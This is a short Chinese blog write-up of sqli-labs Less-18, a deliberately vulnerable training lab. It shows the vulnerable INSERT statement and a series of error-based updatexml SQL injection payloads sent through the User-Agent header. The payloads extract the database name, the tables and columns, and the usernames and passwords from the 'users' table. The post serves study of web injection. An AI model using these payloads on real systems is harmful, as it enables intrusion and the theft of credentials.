Less18

模拟注册后注入
这里的注入语句可以不使用注释符的原因在于:
在源码中看到:uagent是在IP和uname之前的,如果注释掉后面的语句,会直接导致Insert语句直接异常,达不到我们查询的目的。
根据语句写对应注释' and and ' 、 ' or and '
$insert="INSERT INTO security.uagents (uagent, ip_address, username) VALUES ('$uagent', '$IP', $uname)";

' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '

不知道and出什么问题了

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '

' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) and '

' or updatexml(1,concat(0x7e,substr((select group_concat(id,0x2d,username,0x2d,password) from users),1),0x7e),1) and '

标签: none

添加新评论

  • 上一篇: Less17
  • 下一篇: 没有了